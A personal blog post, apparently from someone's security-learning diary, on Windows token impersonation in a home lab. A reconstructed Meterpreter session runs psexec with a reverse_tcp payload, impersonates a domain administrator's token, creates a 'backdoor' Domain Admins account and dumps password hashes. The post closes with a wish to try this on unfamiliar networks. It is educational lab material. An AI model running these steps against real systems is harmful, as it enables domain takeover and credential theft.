Token Impersonation

Today was all about token impersonation. The concept is pretty easy to understand if you’ve been around the internet long enough. It’s basically a cookie.

A cookie from a web site lets you keep using that site without logging in again: a small piece of data stored on your computer carries proof that you already authenticated. A Windows access token plays the same role for a logged-on user, except it lives in the operating system rather than in the browser. It records who the user is (their SID, group memberships and privileges), and Windows presents it on the user's behalf when they reach out to network resources such as Remote Desktop and network drives.

When a domain user logs on to a machine, Windows creates an access token for that logon session, and anyone who already controls the machine with enough privilege (normally SYSTEM) can pick that token up and act as the user. In today's case, my lab was set up with an account on a regular workstation that had domain administrator privileges. That was going to be the account to target.

Unfortunately, I have not learned how to do this yet without the help of meterpreter, but it was no matter; whichever way you can take over a network is fun! So with meterpreter, we used psexec, which I’ve written about in the past. The payload was a reverse_tcp Meterpreter shell, and the attack was pretty straightforward. The workstation was previously pwned, so it was time to just play around with the tokens.

Within meterpreter, I loaded incognito, listed the available tokens, looked for a domain administrator, and started the attack. After the impersonate_token command, I could add users, add users to groups, and a couple of other things. Interestingly, at this point I couldn’t run hashdump while impersonating the token because it didn’t have the privileges, so I just typed rev2self, which put me back to the original state on the pwned machine (who I was before I impersonated the token).
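The session below is an added example reconstructing the steps above, not a transcript from the original post. The addresses (10.0.0.5 attacker, 10.0.0.20 workstation, 10.0.0.10 domain controller), the domain name LAB, the account names and the passwords are all placeholders, and the output lines are abbreviated to what matters.

```console
# Assumed lab values: local admin creds on 10.0.0.20 were recovered earlier.
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.0.20
msf6 exploit(windows/smb/psexec) > set SMBUser localadmin
msf6 exploit(windows/smb/psexec) > set SMBPass Passw0rd!
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5
msf6 exploit(windows/smb/psexec) > exploit

# psexec runs its service binary as SYSTEM; confirm that before touching tokens,
# because listing other users' tokens needs that level of access.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# Load incognito and list user tokens. Only "Delegation" tokens can be used
# to authenticate to other hosts; "Impersonation" tokens only work locally.
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
LAB\Administrator
NT AUTHORITY\SYSTEM
...
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

# Impersonate the domain admin (the double backslash is required in the console).
meterpreter > impersonate_token LAB\\Administrator
[+] Delegation token available
[+] Successfully impersonated user LAB\Administrator
meterpreter > getuid
Server username: LAB\Administrator

# Act as that user against the domain: create an account and put it in
# Domain Admins. -h points the operation at the domain controller (assumed).
meterpreter > add_user backdoor Str0ngPass! -h 10.0.0.10
meterpreter > add_group_user "Domain Admins" backdoor -h 10.0.0.10

# hashdump reads the local SAM and needs SYSTEM on this box; a domain-admin
# token is not SYSTEM here, so it fails with a priv_passwd_get_sam_hashes error.
meterpreter > hashdump
# Drop the impersonation to get SYSTEM back, then dump.
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
```

Two things worth checking before relying on this. First, the delegation token only exists while the domain admin's logon session is alive on that workstation; if the user has logged off, list_tokens will not show it, and impersonate_token will report that the token was not found. Second, the reason this works in the lab is that a domain administrator logged on to an ordinary workstation, which is exactly why tiered administration keeps domain-admin logons off workstations.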

This attack could be fun and very useful. I was able to take over so easily today because it was a lab that I created, but I would love to try it on a bigger network of which I have no knowledge. Perhaps I’ll look around for friends who have created their own networks and see if we can share challenges!
